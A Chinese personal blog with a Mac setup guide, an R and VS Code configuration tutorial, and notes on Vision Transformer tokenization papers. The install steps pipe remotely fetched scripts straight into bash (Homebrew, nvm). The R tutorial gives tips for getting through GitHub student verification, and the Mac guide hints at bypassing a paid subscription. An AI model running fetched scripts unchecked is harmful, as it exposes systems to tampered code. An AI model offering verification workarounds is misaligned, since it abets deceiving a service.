💾

从零开始配置 Mac

2024年9月15日 04:03

写在前面

本文所涉及的所有安装,均带有强烈的个人偏好,例如,我会在功能性接近的情况下更倾向于更好看的界面设计,而非追求最极致的性能。我偏好开源,但也通过 SetApp 订阅获得了许多付费的正版软件。

个人定位是设计师+程序员。

App 列表

Homebrew

Homebrew 是一个 macOS 下的包管理器,可以通过它安装许多软件。

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  • git:代码版本控制
  • ffmpeg:视频处理
  • gpg:git 提交加密工具
  • tree:树状目录
  • btop:资源监控工具
brew install git ffmpeg gpg tree btop
  • EasyFind:功能极其强大的文件搜索工具,HoudahSpot 的高阶替代品,搜索效果更好但是界面不如 HoudahSpot 好看。
brew install --cask easyfind

SetApp

SetApp 是 macOS 的一个基础软件订阅服务,它类似于 AppStore,但不同的是,你只需要为它支付一个统一的费用,便可以免费使用其中的所有软件。

  • AirBuddy:AirPods 管理,提供了一个类似 iOS 的连接弹窗
  • AlDento Pro:macOS 电池管理,我用来锁定电池充电百分比为 75%,以延长电池寿命,有开源平替 Battery-Toolkit,但其几乎没有 GUI,只保留了最基础的功能
  • Bartender:菜单栏管理器,有开源平替 Ice
  • CleanShotX:截图工具,优雅、接近原生的界面,便捷的修改操作
  • PixelSnap:像素级精确截图测量工具,CleanShotX 的扩展
  • DevUtils:开发工具箱,现已不常用,有开源平替 DevToysMac
  • Downie:视频下载工具,偶尔用用,如果想要下载高分辨率 Bilibili 视频,推荐使用 BBDown
  • Permute:视频、照片等文件转码
  • ForkLift:FTP 文件管理器,有着接近原生的 UI 设计
  • HazeOver:高亮当前窗口,同时掩蔽其他窗口,辅助集中注意力
  • HoudahSpot:文件搜索,不如 EasyFind 好用,但胜在界面好看
  • MindNode:好看好用的思维导图
  • Noizio:环境音、白噪音软件,界面好看
  • Paste:剪贴板管理,界面极其好看,强推,有开源平替 Maccy,但操作体验略逊。在 BoringNotchRaycast 上也有类似的剪贴板管理功能。
  • Moment:菜单栏日期计数(正数、倒数)
  • OneSwitch:菜单栏功能快捷开关,包括屏幕常亮防止睡眠、清洁屏幕(黑屏、锁定键盘)等功能,除清洁屏幕已经不常用。有开源平替 OnlySwitch
  • NotchNook:构思巧妙、UI/UX 设计精致的 macOS 灵动岛,有开源平替 BoringNotch
  • Squash:图片压缩工具,可以批量处理,界面好看
  • Timing:时间追踪工具,界面好看、功能强大

AppStore

  • Bob:macOS 下最优秀的识图、划词翻译工具,可以配合 OpenAI 等多家服务使用,58 ¥买断制。有开源平替 EasyDict,其基于 Bob 早年的开源版本 Fork 开发,近期也已经换到 Swift 编写,感觉体验已经接近 Bob。
  • Immersive Translate:最强的网页翻译工具,也可以配合 OpenAI 等多家服务使用
  • Cascadea:Safari 插件,自定义网页样式,18 ¥买断制
  • Userscripts:开源的 Safari 插件,自定义网页脚本
  • 超级右键 Pro:右键增强工具,包括拷贝路径、在各种 IDE/终端中打开等功能,68 ¥买断制
  • Sorted3:任务管理、日程安排,238 ¥买断制(iOS+macOS)
  • DarkReader for Safari:Safari 的 DarkReader 插件
  • Flow:高颜值、功能强大的番茄钟工具,可以阻止应用、网站。168 ¥买断制或者 7 ¥/月的订阅制
  • Pure Paste:剪贴板移除格式工具,可以移除剪贴板中的格式,保留纯文本

Github

先放一份 Star List 在这里:zhuozhiyongde / Mac

  • Rectangle:窗口管理,分屏工具。出了新一代 Rectangle 2,但功能上没差,不需要升级
  • Clash Nyanpasu:好看的猫猫
  • Sequel Ace:好看的 MySQL 数据库管理工具
  • IINA:macOS 下最好的视频播放器
  • KeyCastr:按键显示工具,录屏时使用
  • Motrix:下载工具,支持多线程下载
  • YesPlayMusic:基于 Vue 编写网易云音乐第三方客户端,功能更加简洁,设计优雅,移除了评论和各种杂七杂八功能。
  • PicGo:图床工具,与 Typora 配合使用
  • Local Send:局域网文件传输工具
  • MessAuto:自动提取短信中的验证码并填写
  • SourceCodeSyntaxHighlight:在 Finder 中使用空格进行代码文件预览,支持多种语言高亮
  • AirBattery:蓝牙设备电量显示,支持在程序坞、桌面小组件、菜单栏显示
  • Upscayl:macOS 下的图片放大工具,基于 SOTA 的 AI 模型,效果不错,操作简单

Other

  • VS Code:最好的 IDE(?)
  • Cursor:基于 VS Code 开源代码的闭源 IDE,主要是对 AI 的功能支持更好,可以对工作区多个文件协同处理、提问
  • Typora:所见即所得的 Markdown 编辑器
  • Warp:超好用的终端,支持界面自定义,支持输入区类似文本编辑一样的体验,再也不用按半天 ← → 或者 option了,但是在开源方面有所争议,也有开源平替 Wave
  • Keka:压缩解压工具
  • Raycast:macOS 下最好用的快捷启动工具,可以安装多种插件、管理剪贴板、快捷判断、启动脚本,功能强大界面优雅,Pro 订阅 20$/月,~~但是可以通过一些方法绕过~~
  • Alfred 5:同 Raycast,但是我更喜欢 Raycast 的界面设计,34$ 买断制,在脚本制作方面可能比 Raycast 更容易一些,但是因为颜值的原因已经被我抛弃
  • Arc:macOS 下好看、新颖的浏览器,Chromium 内核,垂直标签页,多工作空间切换
  • Umbra:macOS 下缺失的黑暗模式桌面壁纸切换工具
  • DaisyDisk:磁盘清理工具,9.99$ 买断制
  • Itsycal:菜单栏日历,简洁可爱
  • Hoppscotch:好看的 API 调试工具
  • PDF Expert:很好看好用的 PDF 阅读、编辑器,但 MAS 年费太贵了
  • FreeDownload Manager:功能极其强大的多线程下载工具,只可惜是基于 QT 编写的,界面不够好看
  • EndNote:参考文献管理工具
  • Battery Buddy:菜单栏电量显示,简洁可爱
  • RightFont:字体管理工具,界面好看,59$ 买断制
  • Mathpix:数学公式截图转 LaTeX,可惜教育版免费额度已经降低至 20 张/月
  • SimpleTex:数学公式截图转 LaTeX,国产且免费额度足够多,效果比 Mathpix 略差
  • App Cleaner & Uninstaller,功能强大,但是贵
  • App Cleaner:好用的卸载工具,简洁免费,但是功能上略有欠缺
  • Surge:macOS 下最好的网络调试工具
  • Tailscale:让你的多个设备处于同一局域网内
  • Parsec:远程桌面工具,效果极好,甚至可以让我在 Mac 上链接到家中 PC 打 3A 游戏
  • OneThing:菜单栏文本显示
  • Dark Mode Buddy:根据环境光线明暗自动切换暗黑模式
  • Screen Studio:颜值很高的录屏软件,与 CleanShotX 或者其他常规录屏软件不同的是,可以动态录制键盘鼠标操作,适时放大,适合作为操作教学录屏工具。89$ 买断制
  • Orb Stack:macOS 下颜值很高、功能强大的 Docker Desktop 替代品
  • Snap Art:搭配 Photoshop 使用,超多艺术风格滤镜
  • Vector Magic:位图转矢量图转换工具

VS Code 插件

主题

  • Ayu
  • Moegi Theme
  • Catppuccin Icons for VSCode

其他

仅列出知名度不高的插件

  • Auto Rename Tag
  • Code Runner
  • CodeTime:编码时间统计
  • Markdown Image:Markdown 图片插入,支持便捷的重命名
  • Open In Typora
  • Ruff:Python 代码检查器和格式化工具

Raycast 插件

  • Color Picker
  • Gitmoji
  • Kill Process
  • Visual Studio Code
  • Quick LaTeX
  • Port Manager
  • Quit Applications
  • SimpleTexOCR
  • Surge
  • Coffee

CLI

依旧是先放一个 Star List:zhuozhiyongde / Tools

Zsh

我使用 rcm 来管理配置文件 dotfiles, 通过 rcm 可以将配置文件备份至 ~/.dotfiles,也可以从 ~/.dotfiles 通过软连接的形式还原备份至 ~

我的配置项基本修改自 Innei/dotfiles,在此基础上做了一些客制化修改,不便开源,建议你基于这个仓库维护一份自己的 dotfiles。

从 dotfiles 还原备份至 ~/.dotfiles

rcup -t mac

我使用的部分 CLI 工具:

  • starship:漂亮的终端美化工具
  • zoxide:目录导航工具,快速切换目录
  • btop:类似 htop 的资源监控工具,信息更加详尽,且操作性比 htop 更好
  • tmux:终端多窗口管理工具,但我更常用来当做守护进程工具,较 pm2 相比,可以在启动后仍然进行交互操作
  • BBDown:Bilibili 视频 CLI 下载工具
  • fx:终端 JSON 交互工具
  • gh:GitHub CLI
  • lobe-cli-toolbox:好用的标准化 git commit 信息生成工具,支持 AI 生成

MiniConda

我使用 MiniConda 来管理 Python 版本、环境。

Minoconda

mkdir -p ~/.miniconda3
curl https://repo.anaconda.com/miniconda/Miniconda3-latest-MacOSX-arm64.sh -o ~/.miniconda3/miniconda.sh
bash ~/.miniconda3/miniconda.sh -b -u -p ~/.miniconda3
rm ~/.miniconda3/miniconda.sh
  • ruff:Rust 编写的 Python 代码检查器和格式化工具

nvm / node

我使用 nvm 来对 Node.js 版本进行管理。

nvm

curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.1/install.sh | bash

安装完成后,换源,将如下命令追加到 .bashrc

export NVM_NODEJS_ORG_MIRROR=http://npm.taobao.org/mirrors/node
  • pm2:守护进程
  • pnpm:Node 包管理器
  • nrm: Node 镜像源管理
npm install -g pm2 nrm pnpm

字体

💾

从零开始的 R 语言配置过程

2024年9月7日 12:23

阅前须知:在本文中,可能会不可避免的使用一些境外网站资源,如果你已经有了科学上网工具,请打开,调整到规则或者全局模式,打开 TUN 或者增强模式。

macOS

安装 R

  1. 访问 R 语言网站的清华镜像源,选择 Download R for macOS,根据你的芯片架构,选择对应的 arm64 /x86_64 版本,下载

  2. 打开下载下来的安装包,安装 R,推荐全默认配置进行

  3. 找到你的 R 的位置,注意不是 Rgui,是单纯的 R,你可以在终端中输入 where R 来找到它,假设为:

    /usr/local/bin/r
    

    记录之。

  4. 配置清华源镜像

    R 的用户目录在 macOS 系统下默认位于当前用户的家文件夹,所以你需要在你的家目录下创建一个名为 .Rprofile 的文件来进行配置,你可以在终端中输入如下指令来一键完成:

    echo 'options("repos" = c(CRAN="https://mirrors.tuna.tsinghua.edu.cn/CRAN/"))' >> ~/.Rprofile
    

    这样,R 在安装包时,就会默认使用清华源镜像。

安装 Python

  1. 访问 Miniconda 官网,根据你的芯片架构,选择对应的项目进行下载:

  2. 打开下载下来的安装包,安装 Python,如果出现询问 Advanced Installation Options ,勾选全部选项:

    win-miniconda

    这里是 windows 的配图,macOS 我不想重新装一遍,所以就借用一下了

  3. 点击安装

  4. 换源为清华源:打开终端,键入如下命令,并执行:

    python -m pip install -i https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple --upgrade pip
    pip config set global.index-url https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple
    
  5. 安装 radian

    pip install radian
    
  6. 获取 radian 路径

    在终端输入:

    where radian
    

    得到类似如下输出:

    /Users/zhuozhiyongde/.miniconda3/bin/radian
    

    记录之。

  7. 在你的家目录(如 /Users/zhuozhiyongde)下创建一个 .radian_profile 的文件,写入如下内容:

    Sys.setenv(LANG = "en_US.UTF-8")
    

    这样,你的 radian 将会默认使用英文,从而避免报错乱码。

  8. 在终端输入 radian,即可进入 radian 的交互式 R 终端,然后输入:

    options("repos" = c(CRAN="https://mirrors.tuna.tsinghua.edu.cn/CRAN/"))
    install.packages("languageserver")
    install.packages("httpgd")
    

    安装完毕后,按住 Ctrl + D,即可退出 radian 的交互式 R 终端。

安装 VS Code

VSCode 是一个现代 IDE,可以通俗理解为写代码的软件,它具有可高度自定义的用户界面与丰富的插件系统,我们需要配置它来写 R 语言。

  1. 访问 Visual Studio Code 官网,下载 macOS 安装包

  2. 打开下载下来的安装包,安装 VS Code

  3. 在左侧的 扩展(Extentions) 选项卡中,搜索如下插件并安装:

    • Chinese (Simplified) (简体中文):这个是中文语言包
    • R:R 语言官方的 VSCode 插件
    • R Debugger:R 语言官方的调试器
    • Ayu:好看的颜色主题
    • Moegi Theme:好看的颜色主题 + 1
    • Catppuccin Icons for VSCode:好看的文件图标主题
  4. 回到 资源管理器 选项卡,打开一个文件夹,没有的话可以新建

  5. 按住 Cmd + Shift + P,输入 Settings,选择 首选项:打开用户设置,搜索如下关键字,对 R/R Debugger 插件进行配置:

    1. r.rpath.mac:配置为之前在安装 R 哪一步的 R 路径,如

      /usr/local/bin/r
      
    2. r.rterm.mac:配置为之前在安装 Python 哪一步的 radian 路径,如:

      /Users/zhuozhiyongde/.miniconda3/bin/radian
      
    3. r.bracketedPaste:勾选

    4. r.lsp.debug:勾选

    5. r.plot.defaults.colorTheme:选择 vscode

    6. r.plot.useHttpgd:勾选

    7. r.sessionWatcher:勾选

    8. r.rterm.option:添加如下几项:

      1. --no-save
      2. --no-restore
      3. --no-site-file

      win-rterm-option

至此,你就完成了 R 的所有配置。

Windows

安装 R

  1. 访问 R 语言网站的清华镜像源,选择 Download R for Windows,选择 base,下载

  2. 打开下载下来的安装包,安装 R,推荐全默认配置进行

  3. 找到你的 R 的位置,注意不是 Rgui,是单纯的 R,假设为:

    C:\Program Files\R\R-4.4.1\bin\x64\R.exe
    

    记录之。

  4. 配置清华源镜像

    R 的用户目录在 Windows 系统下默认位于当前用户的 Documents 文件夹,所以你需要在

    C:\Users\arthals\Documents\
    

    下创建一个名为 .Rprofile 的文件(创建一个 txt 文件,然后重命名,记得删掉 .txt 后缀),写入如下内容并保存:

    options("repos" = c(CRAN="https://mirrors.tuna.tsinghua.edu.cn/CRAN/"))
    

    这样,R 在安装包时,就会默认使用清华源镜像。

安装 Python

  1. 访问 Miniconda 官网,找到名为 Miniconda3 Windows 64-bit 的链接,点击下载

  2. 打开下载下来的安装包,安装 Python,注意询问 Advanced Installation Options 时,勾选全部选项:

    win-miniconda

  3. 点击安装

  4. 换源为清华源:打开终端,键入如下命令,并执行:

    python -m pip install -i https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple --upgrade pip
    pip config set global.index-url https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple
    
  5. 安装 radian

    pip install radian
    
  6. 获取 miniconda 路径

    conda info --base
    

    默认情况下,输出应当类似于:

    C:\Users\arthals\miniconda3
    
  7. 获取 radian 路径

    把这个路径在后面加上 \Scripts\radian.exe,然后就得到了你的 radian 路径,如:

    C:\Users\arthals\miniconda3\Scripts\radian.exe
    

    记录之。

  8. 在你的家目录(如 C:\Users\arthals)下创建一个 .radian_profile 的文件,写入如下内容:

    Sys.setenv(LANG = "en_US.UTF-8")
    

    这样,你的 radian 将会默认使用英文,从而避免报错乱码。

  9. 在终端输入 radian,即可进入 radian 的交互式 R 终端,然后输入:

    options("repos" = c(CRAN="https://mirrors.tuna.tsinghua.edu.cn/CRAN/"))
    install.packages("languageserver")
    install.packages("httpgd")
    

    安装完毕后,按住 Ctrl + D,即可退出 radian 的交互式 R 终端。

安装 VS Code

VSCode 是一个现代 IDE,可以通俗理解为写代码的软件,它具有可高度自定义的用户界面与丰富的插件系统,我们需要配置它来写 R 语言。

  1. 访问 Visual Studio Code 官网,下载 Windows 安装包

  2. 打开下载下来的安装包,安装 VS Code

  3. 在左侧的 扩展(Extentions) 选项卡中,搜索如下插件并安装:

    • Chinese (Simplified) (简体中文):这个是中文语言包
    • R:R 语言官方的 VSCode 插件
    • R Debugger:R 语言官方的调试器
    • Ayu:好看的颜色主题
    • Moegi Theme:好看的颜色主题 + 1
    • Catppuccin Icons for VSCode:好看的文件图标主题
  4. 回到 资源管理器 选项卡,打开一个文件夹,没有的话可以新建

  5. 按住 Ctrl + Shift + P,输入 Settings,选择 首选项:打开用户设置,搜索如下关键字,对 R/R Debugger 插件进行配置:

    1. r.rpath.windows:配置为之前在安装 R 哪一步的 R 路径,如

      C:\Program Files\R\R-4.4.1\bin\x64\R.exe
      
    2. r.rterm.windows:配置为之前在安装 Python 哪一步的 radian 路径,如:

      C:\Users\arthals\miniconda3\Scripts\radian.exe
      
    3. r.bracketedPaste:勾选

    4. r.lsp.debug:勾选

    5. r.plot.defaults.colorTheme:选择 vscode

    6. r.plot.useHttpgd:勾选

    7. r.sessionWatcher:勾选

    8. r.rterm.option:添加如下几项:

      1. --no-save
      2. --no-restore
      3. --no-site-file

      win-rterm-option

至此,你就完成了 R 的所有配置。

使用 R

常用的使用方式有这几种:

  1. 光标停在某行,按下 Ctrl / Cmd + Enter 即可逐行运行

  2. 选中多行,再按下 Ctrl / Cmd + Enter 即可多行运行

  3. 右键点击右上角的运行按钮,选择 Run source,即可运行当前文件

    win-run-source

使用 Copilot

Copilot 是一个 AI 辅助编程工具,可以帮助你快速生成代码。

白嫖 Copilot 需要完成学生认证,这里不做展开,你可以自行搜索相关教程。这里简要提示一下可能有用的技巧:

  • 保证人的 GPS 位置在校园附近
  • 保证你的邮箱是学校邮箱
  • 拍摄照片时,在学生卡旁边附上手写的英文版、含有 Valid Until: MM / YYYY 的纸张

当你完成了学生认证之后,只需在 VSCode 中登录,然后安装 GitHub Copilot 插件,即可使用 Copilot,实现 AI 代码自动补全。

使用 ChatGPT

请参见我发的树洞 6561773。

💾

Visual Tokenizer

2024年9月2日 01:47

本文主要介绍一些对于 ViT 的改进工作。

本文中,令牌 /token 为等价表述。

Image as Set of Points

arxiv / 2303.01494

前情提要:CoAtNet

标准 ViT

因为使用了绝对位置 embedding,标准 ViT 缺少平移不变性(指只关注相对距离,不关注绝对位置)

CoAtNet

在自注意力之前先做卷积,可以有比原生 ViT 更好的表现。可以兼顾平移等变性(来自卷积)、输入自适应加权、全局感受野(来自自注意力)

核心改进:点集聚类

这篇文章提出了上下文聚类,它放弃了流行的卷积或注意力机制,而是新颖地考虑了经典算法 —— 聚类,来进行视觉学习的表示。

从图像到点集

首先将每个像素加上位置二维坐标信息 $\left[\frac{i}{w}-0.5, \frac{j}{h}-0.5\right]$ 后转为五维点,形成点集 $\mathbf{P}\in\mathbb{R}^{5\times n}$,其中 $n=w\times h$。

对点集进行特征提取

使用聚类算法,在空间中均匀选择一些锚点,并将最近的 $k$ 个点通过线性投影后进行连接和融合。

  1. 上下文聚类:将特征点 $\mathbf{P}\in\mathbb{R}^{n\times d}$ 根据相似性分成多个簇,每个点分配给一个簇。使用线性投影 $\mathbf{P}$ 到 $\mathbf{P}_s$ 进行相似性计算,并计算点与中心点之间的余弦相似度矩阵 $\mathbf{S}\in\mathbb{R}^{c\times n}$。

  2. 特征聚合:基于与中心点的相似性动态聚合簇中的点,聚合特征 $g$ 通过公式:

    $$ g = \frac{1}{\mathcal{C}} \left( v_c + \sum_{i=1}^{m} \mathrm{sig}\left(\alpha s_i+\beta\right) * v_i \right), \qquad \mathrm{s.t.}, \
    \mathcal{C} = 1+ \sum_{i=1}^{m}\mathrm{sig}\left(\alpha s_i+\beta\right) $$

    其中,$\alpha$ 和 $\beta$ 是可学习的,$s_i$ 是这些点与中心点的相似度,$m$ 是这个簇内的点的个数

  3. 特征分配:将聚合的特征 $g$ 自适应地分配给簇中的每个点:

    $$ p_i' = p_i + \mathrm{FC}\left(\mathrm{sig}\left(\alpha s_i+\beta\right) * g\right) $$

Vision Transformer with Super Token Sampling

arxiv / 2211.11167

前情提要:SSN

首先介绍一下什么 SSN

过往的 SLIC 算法基于 $k-means$ 聚类算法,由于其计算用到了最近邻操作,所以不可微分,无法实现端到端训练。

其目标可以形式化表示为:给定图像 $I \in \mathbb{R}^{n \times 5}$,在 $n$ 个像素处具有 $5$ 维的 $XYLab$ 特征,超像素计算的任务是将每个像素分配给 $m$ 个超像素之一,即计算像素 - 超像素关联图 $H \in {0,1,\cdots,m-1}^{n \times 1}$,表示每个原始像素只属于一个超像素。

那么 SLIC 的计算过程可以表示为:

  1. 将每个像素与五维空间中最近的超像素中心关联,即计算每个像素 $p$ 的新超像素分配:

    $$ H_p^t = \underset{i \in {0,...,m-1}}{\arg \min}D(I_p, S^{t-1}_i) $$

    其中, $D$ 表示距离计算 $D(\textbf{a},\textbf{b}) = ||\textbf{a}-\textbf{b}||^2$。

    注意,此操作正是不可微分的来源

  2. 在每个超像素聚类内部平均像素特征($XYLab$)以获得新的超像素聚类中心 $S^t$。对于每个超像素 $S_i$,我们计算该聚类的质心并使之更新 $S_i$:

    $$ S^t_i = \frac{1}{Z_i^t}\sum_{p | H_p^t = i} I_p $$

    其中 $Z_i^t$ 表示超像素簇 $i$ 中的像素数量。

SLIC 在此基础上,将最近邻计算转为了可微分的操作,使用软关联 $Q$(每个像素可以与多个超像素有不同程度的关联,其中 $Q \in \mathbb{R}^{n \times m}$)代替了硬关联 $H$:

$$ Q_{pi}^t = e^{-D(I_p,S_i^{t-1})} = e^{-||I_p - S_i^{t-1}||^2} $$

其中, $Q_{pi}^t$ 表示迭代 $t$ 时像素 $p$ 与超像素 $i$ 的软关联,$I_p$ 表示像素 $p$ 的特征,$S_i^{t-1}$ 表示迭代 $t-1$ 时超像素 $i$ 的中心。

并且替换了超像素聚类中心的计算,改为计算像素特征的加权和:

$$ S^t_i = \frac{1}{Z_i^t}\sum_{p=1}^n Q_{pi}^t I_p $$

其中,$S^t_i$ 表示迭代 $t$ 时超像素 $i$ 的新中心,$Z_i^t = \sum_p Q_{pi}^t$ 是归一化常数。

同时,为了减少计算复杂度,对于每个像素,SSN 只对其原始位置划分得到的周围 $3\times3=9$ 个超像素执行计算与更新(注:即便随着迭代轮次增加,超像素中心会偏移,但是依照我的理解,依旧是只对其原始位置附近这 9 个超像素进行更新)

SSN

核心思想:将超像素的 SSN 应用到 token 上,实现 token 的聚合

STViT

STT 块整体过程可以表示为:

$$ \begin{align} X &= {\rm CPE}(X_{in}) + X_{in} \ Y &= {\rm STA}({\rm LN}(X)) + X \ Z &= {\rm ConvFFN}({\rm BN}(Y)) + Y \end{align} $$

CPE (Coordinate Pointwise Encoding, 坐标点注意力)

使用深度卷积的主要目的是减少计算量。

这一步和后面的的 ConvFFN 都是为了补充局部的细节。

STA (Super Token Attention, 超像素注意力)

  1. STS (Super Token Sampling, 超令牌采样)
  2. MHSA (Multi-Head Self-Attention, 多头自注意力)
  3. TU (Token Upsampling, 令牌上采样)

超令牌采样

超令牌采样基本上就是把 SSN 的思想应用到超令牌空间,对于先前嵌入得到的基础视觉令牌,我们进行如下操作:

  1. 初始化超令牌

    给定视觉令牌 $X \in \mathbb{R}^{N \times C}$,其中 $N = H \times W$ 是令牌数量,每个令牌 $X_i \in \mathbb{R}^{1 \times C}$ 假设属于 $m$ 个超令牌 $S \in \mathbb{R}^{m \times C}$ 之一。我们首先通过在常规网格区域中取平均值来采样初始超令牌 $S^0$。如果网格大小为 $h \times w$,那么超令牌的数量为 $m = \frac{H}{h} \times \frac{W}{w}$。

  2. 将令牌与超令牌关联

    在第 $t$ 次迭代中,我们计算令牌 $X$ 和超令牌 $S$ 的关联,我们采用类似注意力机制的方式:

    $$ Q^t = \text{Softmax} \left(\frac{X {S^{t-1}}^{\text{T}}}{\sqrt{d}}\right) $$

    其中:

    • $d$ 是通道数 $C$。

    • $X \in \mathbb{R}^{N \times C}$:$N$ 是令牌数量,$C$ 是通道数。

    • ${S^{t-1}} \in \mathbb{R}^{m \times C}$:$m$ 是超级令牌数量,$C$ 是通道数。

    这个过程不同于 SSN 的原始设计,实际上是计算了令牌和超级令牌之间的点积相似度,而不是 SSN 的计算距离,并且使用了 Softmax 进行归一化,使得关联度具有概率解释。

    (Q:这里其实我说不好那种方式更优,~~SSN 的话要求超令牌的欧几里得范数不是越大越相似,而是大概和令牌本身相似就好,但是超令牌采样这里,由于计算的是点积相似度,似乎是欧几里得范数越大越相似~~,后面归一化了那没事了)

  3. 更新超令牌

    超令牌 $S$ 被更新为令牌的加权和:

    $$ S = ({\hat{Q}}^{t})^{\text{T}} X $$

    其中, $\hat{Q}^t$ 是列归一化的 $Q^t$。

  4. 同样,为了减少计算量,这里也使用了和 SSN 类似的限制关联计算范围、减少更新次数的方法,来降低计算复杂度,并且仅在第一次迭代时更新超令牌。(Q:诶,那后面迭代了个啥)

通过加权和更新超令牌,我们使其更好地代表对应的视觉令牌。

超令牌自注意力机制

由于超令牌是视觉内容的紧凑表示,对其应用自注意力机制可以更关注全局上下文依赖关系,而不是局部特征。我们对采样得到的超令牌 $S \in \mathbb{R}^{m \times C}$ 应用标准的自注意力机制,其定义为:

$$ \text{Attn} (S) = \text{Softmax}\left(\frac{\mathbf{q}(S)\mathbf{k}^{\text{T}}(S)}{\sqrt{d}}\right) \mathbf{v}(S) = \mathbf{A}(S)\mathbf{v}(S) $$

其中:

  • $\mathbf{A}(S) = \text{Softmax}\left(\frac{\mathbf{q}(S)\mathbf{k}^{\text{T}}(S)}{\sqrt{d}}\right) \in \mathbb{R}^{m \times m}$ 是注意力图
  • $\mathbf{q}(S) = SW_q$,$\mathbf{k}(S) = SW_k$ 和 $\mathbf{v}(S) = SW_v$ 是带有参数 $W_q$,$W_k$ 和 $W_v$ 的线性函数。

令牌上采样

尽管超令牌能够通过自注意力机制捕获更好的全局表示,但它们在采样过程中丢失了大部分局部细节。

因此,我们并不直接将它们用作后续层的输入,而是将它们映射回视觉标记并添加到原始标记 $X$ 中。

$$ {\rm TU}({\rm Attn}(S)) = Q {\rm Attn}(S) $$

其中:

  • $Q \in \mathbb{R}^{N \times m}$:上步迭代得到的关联图(association map),表示每个超令牌与原始令牌之间的关系。
  • ${\rm Attn}(S) \in \mathbb{R}^{m \times C}$:经过自注意力机制处理的超令牌,捕捉到的全局特征。

FFN (Feed-Forward Network,前馈神经网络)

没啥说的,感觉也是补偿局部的细节学习能力。

MSViT: Dynamic Mixed-Scale Tokenization for Vision Transformers

arxiv / 2307.02321

核心思想:依靠门控机制创建多尺度令牌

通过引入一个条件门控多层感知器 MLP,从而动态选择每个区域的令牌尺度,实现对于冗余令牌的抑制。

MSViT

在这张图中,可以看到:

  • 上面的图像元素较少,于是背景信息大多使用了较大的令牌尺度(粗令牌)
  • 下面的图像元素很多,内容复杂且细节较多,于是大多使用了较小的令牌尺度(细令牌)

基础定义

我们首先定义细尺度和粗尺度,它们对应上图中两种 patch 尺度的取法:

  • $S_{f}$:细尺度
  • $S_{c}$:粗尺度

其中,$S_{f} < S_{c}$

提取方形 patch :在两个尺度中提取方形 patch,总共有 $N = N_{S_{f}} + N_{S_{c}}$ 个 token。

门控机制的实现

门控机制:引入离散的门控机制 $g$,确定应当选择两个尺度中的哪一个作为输出。活动(被激活的) token 会被进一步送入变换器,而非活动的 token 会被丢弃。

门控机制会解析每个粗尺度 token,并输出一个二元决策,即该区域是否应该在粗尺度或细尺度下进行 token 化。我们额外假定细尺度 $S_{f}$ 能够均匀划分粗尺度 $S_{c}$。对于所有 $i$,第 $i$ 个细尺度 token 可以映射到其所属的唯一粗尺度 token,该映射定义为 $C(i) = j$。

利用这个映射,在细 token 级别恢复完整的二元混合尺度掩码 $\overline{m}$,使用粗级门输出:

$$ \begin{align} \forall j \in [1, N_{S_{c}}],\ &m_j = \text{GumbelSigmoid}(g(x_j)) \in [0, 1] \ &\overline{m}j = \text{STE}(m_j) \in {0, 1} \ \forall i \in [N{S_{c}} + 1, N_{S_{c}} + N_{S_{f}} ],\ &\overline{m}i = 1 - \overline{m}{C(i)} \end{align} $$

其中:

  • $m_j$:训练过程中用于约束门的软输出,范围在 $[0, 1]$
  • $\overline{m}_j$:前向传递过程中使用的离散化输出,取值为 0 或 1
  • $\text{GumbelSigmoid}$:Gumbel-Sigmoid 松弛,是 GumbelSoftmax 的二元版本
  • $\text{STE}$:直通梯度估计器(Straight-Through Estimator),一种在训练过程中用于处理不可导函数的技巧。

有关 Gumbel-Softmax:这是一个重参数化技巧,可以将从离散的概率分布采样这一不可导的操作,转化为一个可导的操作,从而允许进行反向传播。

重参数技巧可以理解为是把采样的步骤移出计算图,这样整个图就可以计算梯度反向传播更新了。其在 VAE 中广泛使用。

具体的数学证明,可以参见 Yiwei Zhang / 离散分布重参数化:Gumbel-Softmax Trick 和 Gumbel 分布

有关 STE:可以参见 刘泽春 / Straight-through estimator (STE) 解读

跨尺度参数共享

将不同尺度的 token 送入后续 ViT,一般需要引入额外参数或者其他方法,但是作者选择在这里直接将粗尺度的 token 通过线性插值调整到细尺度下的等效值,从而能够避免一些诸如路由不平衡和数据饥饿之类的问题。

Q:损失函数看不太懂,怎么学设计这种复杂损失函数啊?

Vision Transformers with Mixed-Resolution Tokenization

arxiv / 2304.00287

这篇文章的大致思想和 MSViT 一致,通过划分不同尺度的 patch 来减少输入 Transformer 的 token 数量,改进计算成本。

核心思想:划分不同尺度的 patch

  1. 动态选择 patch 尺度,通过一个评分函数(评分器) $score$ 来确定选择哪个 “最重要的” patch 来进一步执行四叉树划分,存在 patch 大小的最大值与最小值限制。整个过程的迭代结束条件为分割出的 patch 数量达到预期。

    $$ \begin{aligned} &\text{Input:} \ &\quad\text{Image } im \in \mathbb{R}^{h \times w \times 3}, \ &\quad\text{desired number of patches } L \in \mathbb{N}, \ &\quad\text{patch edge sizes } s_{min}, s_{max} \in \mathbb{N}, \ &\quad\text{saliency scorer } score : patch \rightarrow \mathbb{R}^{+} \ &\text{Output:} \ &\quad\text{The set of chosen patches } P_{chosen} \ &\text{Algorithm:} \ &\quad P_{chosen} \leftarrow \text{slice } im \text{ into a uniform grid with patch size } s_{max} \ &\quad \text{while } |P_{chosen}| < L \text{ do} \ &\quad\quad P_{splittable} \leftarrow {p \mid p \in P_{chosen} \ & \ size(p) \geq 2s_{min}} \ &\quad\quad p_{split} \leftarrow \arg\max_{p \in P_{splittable}} score(p) \ &\quad\quad children(p_{split}) \leftarrow \text{divide } p_{split} \text{ into 4 quadrants} \ &\quad\quad P_{chosen} \leftarrow children(p_{split}) \cup P_{chosen} \setminus {p_{split}} \ &\quad \text{end} \ &\text{Return } P_{chosen} \end{aligned} $$

  2. 对于每个非 $s_{min}$ 的 patch,统一缩小到 $s_{min}$ 以便于后续展平后得到相同尺寸,送入全连接层进行嵌入。

  3. 位置嵌入:以由最小补丁大小 $s_{min}$ 确定网格,嵌入 patch 中心的 $(x,y)$ 位置。

  4. 评分器:作者尝试了多种评分器,最终选择了基于特征的 patch 评分器:

    scorer

Token Merging: Your ViT But Faster

arxiv / 2210.09461

核心思想:令牌合并

本文提出了一种名为 “令牌合并” 的方法来组合令牌,而不是像过往文章中常见的修剪令牌操作。

